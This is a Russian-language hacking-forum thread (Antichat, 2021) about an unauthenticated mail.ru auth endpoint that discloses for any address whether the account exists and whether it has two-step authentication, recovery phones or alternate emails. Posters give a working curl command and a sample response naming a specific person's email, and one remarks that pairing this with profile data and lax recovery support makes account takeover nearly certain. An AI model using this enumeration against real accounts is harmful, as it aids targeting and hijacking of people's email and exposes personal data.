ANTICHAT - Mail(ру) мейл(ru)... wtf...

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - Mail(ру) мейл(ru)... wtf... (https://forum.antichat.xyz/showthread.php?t=484148)

lifescore

24.06.2021 07:10

Ну вроде бы и да, и вроде бы и нет. Ну вы поняли...

.SpoilerTarget" type="button">Spoiler: не рановато комутеры ломать?
хедеры придумаете если что

https://auth.mail.ru/api/v1/pushauth/info

login=salyaev.n@mail.ru

Код:

{

  "status": 200,

  "htmlencoded": true,

  "email": "salyaev.n@mail.ru",

  "body": {

    "exists": true,

    "twostep": false,

    "can_push": false,

    "alt_email": false,

    "phone": false,

    "trusted": false,

    "available": false,

    "auth": "password",

    "provider": "default",

    "webauthn": [],

    "phones": [],

    "alt_emails": []

  }

}

devton

24.06.2021 18:25

зобавно...ровно 13 лет тому назад кодеры Рамблера той же ***ней страдали...история идет по спирали

/threads/73611/

crlf	24.06.2021 23:01

Цитата:

Сообщение от lifescore

↑
вроде бы и нет

Кому-то Not Applicable влепили?

Цитата:

Сообщение от lifescore

↑
Ну вроде бы и да

Тоже видел пару месяцев назад. Понадеялся, что может есть секретный параметр, который заполняет остальные поля, но "... не получилось, не фартануло"

Цитата:

Сообщение от lifescore

↑
хедеры придумаете если что

Какие? Без шаманств всё работает:

Код:

curl -s 'https://auth.mail.ru/api/v1/pushauth/info' -d 'login=bigbear@mail.ru' | jq

https://i.imgur.com/8IpGmgH.png

https://i.imgur.com/Fta4pXr.png

Забавно:

https://i.imgur.com/KyG5wfw.png

lifescore

25.06.2021 08:32

Цитата:

Сообщение от crlf

↑
Кому-то
Not Applicable
влепили?
Тоже видел пару месяцев назад. Понадеялся, что может есть секретный параметр, который заполняет остальные поля, но
"... не получилось, не фартануло
"
Какие? Без шаманств всё работает:

Код:

curl -s 'https://auth.mail.ru/api/v1/pushauth/info' -d 'login=bigbear@mail.ru' | jq

https://i.imgur.com/8IpGmgH.png
https://i.imgur.com/Fta4pXr.png
Забавно:
https://i.imgur.com/KyG5wfw.png

Всех спалил?)

С учетом как саппорт на recovery работал года два назад, мой мир профиль + эта инфа > 101% success

Про себя не забыли

Код:

{

  "status": 403,

  "htmlencoded": true,

  "email": "root@mail.ru",

  "body": "forbidden"

}

чур не я

Время: 17:07